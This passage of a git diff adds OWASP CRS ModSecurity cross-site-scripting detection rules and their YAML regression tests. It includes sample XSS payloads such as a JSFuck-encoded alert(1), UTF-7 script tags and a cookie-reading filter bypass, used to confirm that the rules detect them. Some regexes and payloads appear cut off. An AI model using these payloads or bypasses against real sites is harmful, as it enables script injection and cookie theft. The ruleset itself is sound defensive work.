tag:'capec/1000/152/242',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# -=[ XSS Filters - Category 4 ]=- +# XSS vectors making use of javascript uri and tags, e.g.,

+# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\b[^>]*?>[\s\S]*?|(?:=|U\s*?R\s*?L\s*?\()\s*?[^>]*?\s*?S\s*?C\s*?R\s*?I\s*?P\s*?T\s*?:)" \ + "id:941140,\ + phase:2,\ + block,\ + capture,\ + t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ + msg:'XSS Filter - Category 4: Javascript URI Vector',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-xss',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# -=[ NoScript XSS Filters ]=- +# Ref: http://noscript.net/ +# +# [NoScript InjectionChecker] HTML injection +# +# Regexp generated from util/regexp-assemble/regexp-941160.data using Regexp::Assemble. +# To rebuild the regexp: +# cd util/regexp-assemble +# ./regexp-assemble.pl regexp-941160.data +# Note that after assemble an ignore case flag (i) is added to the to the Regexp::Assemble output: +# Add ignore case flag between '?' and ':': "(?i:...)" +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|XML:/* "@rx (?i:(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)(?:on(?:d(?:e(?:vice(?:(?:orienta|mo)tion|proximity|found|light)|livery(?:success|error)|activate)|r(?:ag(?:e(?:n(?:ter|d)|xit)|(?:gestur|leav)e|start|drop|over)|op)|i(?:s(?:c(?:hargingtimechange|onnect(?:ing|ed))|abled)|aling)|ata(?:setc(?:omplete|hanged)|(?:availabl|chang)e|error)|urationchange|ownloading|blclick)|Moz(?:M(?:agnifyGesture(?:Update|Start)?|ouse(?:PixelScroll|Hittest))|S(?:wipeGesture(?:Update|Start|End)?|crolledAreaChanged)|(?:(?:Press)?TapGestur|BeforeResiz)e|EdgeUI(?:C(?:omplet|ancel)|Start)ed|RotateGesture(?:Update|Start)?|A(?:udioAvailable|fterPaint))|c(?:o(?:m(?:p(?:osition(?:update|start|end)|lete)|mand(?:update)?)|n(?:t(?:rolselect|extmenu)|nect(?:ing|ed))|py)|a(?:(?:llschang|ch)ed|nplay(?:through)?|rdstatechange)|h(?:(?:arging(?:time)?ch)?ange|ecking)|(?:fstate|ell)change|u(?:echange|t)|l(?:ick|ose))|s(?:t(?:a(?:t(?:uschanged|echange)|lled|rt)|k(?:sessione|comma)nd|op)|e(?:ek(?:complete|ing|ed)|(?:lec(?:tstar)?)?t|n(?:ding|t))|(?:peech|ound)(?:start|end)|u(?:ccess|spend|bmit)|croll|how)|m(?:o(?:z(?:(?:pointerlock|fullscreen)(?:change|error)|(?:orientation|time)change|network(?:down|up)load)|use(?:(?:lea|mo)ve|o(?:ver|ut)|enter|wheel|down|up)|ve(?:start|end)?)|essage|ark)|a(?:n(?:imation(?:iteration|start|end)|tennastatechange)|fter(?:(?:scriptexecu|upda)te|print)|udio(?:process|start|end)|d(?:apteradded|dtrack)|ctivate|lerting|bort)|b(?:e(?:fore(?:(?:(?:de)?activa|scriptexecu)te|u(?:nload|pdate)|p(?:aste|rint)|c(?:opy|ut)|editfocus)|gin(?:Event)?)|oun(?:dary|ce)|l(?:ocked|ur)|roadcast|usy)|DOM(?:Node(?:Inserted(?:IntoDocument)?|Removed(?:FromDocument)?)|(?:CharacterData|Subtree)Modified|A(?:ttrModified|ctivate)|Focus(?:Out|In)|MouseScroll)|r(?:e(?:s(?:u(?:m(?:ing|e)|lt)|ize|et)|adystatechange|pea(?:tEven)?t|movetrack|trieving|ceived)|ow(?:s(?:inserted|delete)|e(?:nter|xit))|atechange)|p(?:op(?:up(?:hid(?:den|ing)|show(?:ing|n))|state)|a(?:ge(?:hide|show)|(?:st|us)e|int)|ro(?:pertychange|gress)|lay(?:ing)?)|t(?:ouch(?:(?:lea|mo)ve|en(?:ter|d)|cancel|start)|ransition(?:cancel|end|run)|ime(?:update|out)|ext)|u(?:s(?:erproximity|sdreceived)|p(?:gradeneeded|dateready)|n(?:derflow|load))|f(?:o(?:rm(?:change|input)|cus(?:out|in)?)|i(?:lterchange|nish)|ailed)|l(?:o(?:ad(?:e(?:d(?:meta)?data|nd)|start)|secapture)|evelchange|y)|g(?:amepad(?:(?:dis)?connected|button(?:down|up)|axismove)|et)|e(?:n(?:d(?:Event|ed)?|abled|ter)|rror(?:update)?|mptied|xit)|i(?:cc(?:cardlockerror|infochange)|n(?:coming|valid|put))|o(?:(?:(?:ff|n)lin|bsolet)e|verflow(?:changed)?|pen)|SVG(?:(?:Unl|L)oad|Resize|Scroll|Abort|Error|Zoom)|h(?:e(?:adphoneschange|l[dp])|ashchange|olding)|v(?:o(?:lum|ic)e|ersion)change|w(?:a(?:it|rn)ing|heel)|key(?:press|down|up)|(?:AppComman|Loa)d|no(?:update|match)|Request|zoom)|s(?:tyle|rc)|background|formaction|lowsrc|ping)[\s\x08]*?=|<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?(?:(?:a\W*?(?:n\W*?i\W*?m\W*?a\W*?t\W*?e|p\W*?p\W*?l\W*?e\W*?t|u\W*?d\W*?i\W*?o)|b\W*?(?:i\W*?n\W*?d\W*?i\W*?n\W*?g\W*?s|a\W*?s\W*?e|o\W*?d\W*?y)|i?\W*?f\W*?r\W*?a\W*?m\W*?e|o\W*?b\W*?j\W*?e\W*?c\W*?t|i\W*?m\W*?a?\W*?g\W*?e?|e\W*?m\W*?b\W*?e\W*?d|p\W*?a\W*?r\W*?a\W*?m|v\W*?i\W*?d\W*?e\W*?o|l\W*?i\W*?n\W*?k)[^>\w]|s\W*?(?:c\W*?r\W*?i\W*?p\W*?t|t\W*?y\W*?l\W*?e|e\W*?t[^>\w]|v\W*?g)|m\W*?(?:a\W*?r\W*?q\W*?u\W*?e\W*?e|e\W*?t\W*?a[^>\w])|f\W*?o\W*?r\W*?m))" \ + "id:941160,\ + phase:2,\ + block,\ + capture,\ + t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ + msg:'NoScript XSS InjectionChecker: HTML Injection',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-xss',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# [NoScript InjectionChecker] Attributes injection +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:\W|^)(?:javascript:(?:[\s\S]+[=\\\(\[\.<]|[\s\S]*?(?:\bname\b|\\[ux]\d))|data:(?:(?:[a-z]\w+\/\w[\w+-]+\w)?[;,]|[\s\S]*?;[\s\S]*?\b(?:base64|charset=)|[\s\S]*?,[\s\S]*?<[\s\S]*?\w[\s\S]*?>))|@\W*?i\W*?m\W*?p\W*?o\W*?r\W*?t\W*?(?:\/\*[\s\S]*?)?(?:[\"']|\W*?u\W*?r\W*?l[\s\S]*?\()|\W*?-\W*?m\W*?o\W*?z\W*?-\W*?b\W*?i\W*?n\W*?d\W*?i\W*?n\W*?g[\s\S]*?:[\s\S]*?\W*?u\W*?r\W*?l[\s\S]*?\(" \ + "id:941170,\ + phase:2,\ + block,\ + capture,\ + t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ + msg:'NoScript XSS InjectionChecker: Attribute Injection',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-xss',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# [Blacklist Keywords from Node-Validator] +# https://raw.github.com/chriso/node-validator/master/validator.js +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pm document.cookie document.write .parentnode .innerhtml window.location -moz-binding .*?(?:@[i\\\\]|(?:[:=]|&#x?0*(?:58|3A|61|3D);?).*?(?:[(\\\\]|&#x?0*(?:40|28|92|5C);?)))" \ + "id:941190,\ + phase:2,\ + block,\ + capture,\ + t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ + msg:'IE XSS Filters - Attack Detected',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-xss',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:<.*[:]?vmlframe.*?[\s/+]*?src[\s/+]*=)" \ + "id:941200,\ + phase:2,\ + block,\ + capture,\ + t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ + msg:'IE XSS Filters - Attack Detected',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-xss',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:(?:j|&#x?0*(?:74|4A|106|6A);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:a|&#x?0*(?:65|41|97|61);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:v|&#x?0*(?:86|56|118|76);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:a|&#x?0*(?:65|41|97|61);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:s|&#x?0*(?:83|53|115|73);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:c|&#x?0*(?:67|43|99|63);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:r|&#x?0*(?:82|52|114|72);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:i|&#x?0*(?:73|49|105|69);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:p|&#x?0*(?:80|50|112|70);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:t|&#x?0*(?:84|54|116|74);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?::|&(?:#x?0*(?:58|3A);?|colon;)).)" \ + "id:941210,\ + phase:2,\ + block,\ + capture,\ + t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ + msg:'IE XSS Filters - Attack Detected',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-xss',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:(?:v|&#x?0*(?:86|56|118|76);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:b|&#x?0*(?:66|42|98|62);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:s|&#x?0*(?:83|53|115|73);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:c|&#x?0*(?:67|43|99|63);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:r|&#x?0*(?:82|52|114|72);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:i|&#x?0*(?:73|49|105|69);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:p|&#x?0*(?:80|50|112|70);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:t|&#x?0*(?:84|54|116|74);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?::|&(?:#x?0*(?:58|3A);?|colon;)).)" \ + "id:941220,\ + phase:2,\ + block,\ + capture,\ + t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ + msg:'IE XSS Filters - Attack Detected',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-xss',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)]" \ + "id:941290,\ + phase:2,\ + block,\ + capture,\ + t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ + msg:'IE XSS Filters - Attack Detected',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-xss',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)]*[\xbe>]|<[^\xbe]*\xbe" \ + "id:941310,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,t:lowercase,t:urlDecode,t:htmlEntityDecode,t:jsDecode,\ + msg:'US-ASCII Malformed Encoding XSS Filter - Attack Detected',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-tomcat',\ + tag:'attack-xss',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# +# https://nedbatchelder.com/blog/200704/xss_with_utf7.html +# UTF-7 encoding XSS filter evasion for IE. +# Reported by Vladimir Ivanov +# + +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \+ADw-.*(?:\+AD4-|>)|<.*\+AD4-" \ + "id:941350,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,t:urlDecode,t:htmlEntityDecode,t:jsDecode,\ + msg:'UTF-7 Encoding IE XSS - Attack Detected',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-internet-explorer',\ + tag:'attack-xss',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# +# Defend against JSFuck and Hieroglyphy obfuscation of Javascript code +# +# https://en.wikipedia.org/wiki/JSFuck +# https://github.com/alcuadrado/hieroglyphy +# +# These JS obfuscations mostly aim for client side XSS exploits, hence the +# integration of this rule into the XSS rule group. But serverside JS could +# also be attacked via these techniques. +# +# Detection pattern / Core elements of JSFuck and Hieroglyphy are the +# following two items: +# !![] +# !+[] +# +# ModSecurity always transforms "+" into " " with query strings and the +# URLENCODE body processor (but not for JSON). So we need to check for +# the following patterns: +# !![] +# !+[] +# ! [] + +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx ![!+ ]\[\]" \ + "id:941360,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'JSFuck / Hieroglyphy obfuscation detected',\ + logdata:'Matched Data: Suspicious payload found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'attack-xss',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242/63',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# +# Prevent 941180 bypass by using JavaScript global variables +# Refer to: https://www.secjuice.com/bypass-xss-filters-using-javascript-global-variables/ +# +# Examples: +# - /?search=/?a=";+alert(self["document"]["cookie"]);// +# - /?search=/?a=";+document+/*foo*/+.+/*bar*/+cookie;// +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS|XML:/* "@rx (?:self|document|this|top|window)\s*(?:/\*|[\[)]).+?(?:\]|\*/)" \ + "id:941370,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,t:compressWhitespace,\ + msg:'JavaScript global variable found',\ + logdata:'Matched Data: Suspicious JS global variable found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'attack-xss',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242/63',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:941013,phase:1,pass,nolog,skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:941014,phase:2,pass,nolog,skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" +# +# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) +# + +# +# This is a stricter sibling of rule 941100. +# +SecRule REQUEST_HEADERS:Referer "@detectXSS" \ + "id:941101,\ + phase:2,\ + block,\ + capture,\ + t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ + msg:'XSS Attack Detected via libinjection',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-xss',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + tag:'paranoia-level/2',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + +# +# -=[ XSS Filters - Category 5 ]=- +# HTML attributes - src, style and href +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b(?:s(?:tyle|rc)|href)\b[\s\S]*?=" \ + "id:941150,\ + phase:2,\ + block,\ + capture,\ + t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ + msg:'XSS Filter - Category 5: Disallowed HTML Attributes',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-xss',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + tag:'paranoia-level/2',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + +# Detect tags that are the most common direct HTML injection points. +# +# +# +# +# " + output: + log_contains: id "941330" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml new file mode 100644 index 000000000..46ef16920 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml @@ -0,0 +1,35 @@ +--- +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 941340.yaml +tests: + - test_title: 941340-1 + desc: "IE XSS Filters - Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + data: "var=' infoo.bar=&var2=whatever" + version: HTTP/1.0 + output: + log_contains: id "941340" + - test_title: 941340-2 + desc: "XSS test based on portswigger XSS cheatsheet" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + data: "payload=XSS" + version: HTTP/1.0 + output: + log_contains: id "941340" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml new file mode 100644 index 000000000..78be9052e --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml @@ -0,0 +1,22 @@ +--- +meta: + author: fgsch + enabled: true + name: 941350.yaml + description: Test rule 941350 +tests: + - test_title: 941350-1 + desc: GH issue 1514 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: /xx?id=%25252bADw-script%25252bAD4- + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + output: + log_contains: id "941350" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml new file mode 100644 index 000000000..0f8aa29d4 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml @@ -0,0 +1,52 @@ +--- +meta: + author: "Christian Folini" + description: None + enabled: true + name: 941360.yaml +tests: + - test_title: 941360-1 + desc: "JSFuck / Hieroglyphy payload obfuscation attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + data: "a=[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()" + # Payload represents "alert(1)" in JSFuck encoding + version: HTTP/1.1 + output: + log_contains: id "941360" + - test_title: 941360-2 + desc: "JSFuck / Hieroglyphy payload obfuscation attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + data: "a=(![]+[])[+!+[]]" + # Payload represents "a" in JSFuck / Hieroglyphy encoding + version: HTTP/1.1 + output: + log_contains: id "941360" + - test_title: 941360-3 + desc: "JSFuck / Hieroglyphy payload obfuscation attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 